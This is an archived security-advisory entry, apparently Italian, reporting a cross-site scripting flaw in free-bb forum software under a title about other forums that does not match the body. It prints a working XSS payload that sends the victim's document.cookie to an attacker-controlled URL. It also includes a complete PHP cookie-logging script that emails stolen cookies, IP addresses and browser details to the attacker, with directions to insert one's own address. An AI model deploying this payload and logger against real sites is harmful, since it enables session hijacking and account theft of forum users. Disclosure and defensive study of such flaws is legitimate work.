View Topic Flood phpBB, MercuryBoard, Vbulletin, Ipb

2006-05-25T00:00:00
ID SECURITYVULNS:DOC:12783
Type securityvulns
Reporter Securityvulns
Modified 2006-05-25T00:00:00

Description


       /      \
    \  \  ,,  /  /
     '-.`\()/`.-'
    .--_'(  )'_--.
   / /` /`""`\ `\ \           * SpiderZ ForumZ Security *
    |  |  ><  |  |
    \  \      /  /
        '.__.'

• Xss Freebb ( All Version ) • Author: SpiderZ • Sito: http://www.spiderz.altervista.org • Sito2: https://www.spiderz.netsons.org


Xss freebb Sito ufficiale frebb http://www.free-bb.com/fr/

Url : www.sitoweb.com/forum/log.php?log=avatar&sid=1&a=ma

XSS

nrw&la=">><script>document.location.replace('http://WWW.SITOWEB/FILE.php?c='+document.cookie);</script>

Url + xss : www.sitoweb.com/forum/log.php?log=avatar&sid=1&a=ma?nrw&la=">><script>document.location.replace('http://WWW.SITOWEB.COM/FILE.php?c='+document.cookie);</script>

Log cookie ( Exploit.php )

<?php $ip = $_SERVER['REMOTE_ADDR']; $userAgent = $_SERVER['HTTP_USER_AGENT']; $accept=$_SERVER['HTTP_ACCEPT_LANGUAGE']; $cookie = $_GET['c']; $myemail = "LA TUA E-MAIL"; $today = date("l, F j, Y, g:i a") ; $subject = "Xss fre-bb" ; $message = "Xss free-bb Ip: $ip Cookie: $cookie Browser: $userAgent Lingua: $accept Url: $base Giorno & Ora : $today \n "; $from = "From: $myemail\r\n"; mail($myemail, $subject, $message, $from); ?>


Modifica : $myemail = "LA TUA E-MAIL";

es: hacker@mail.com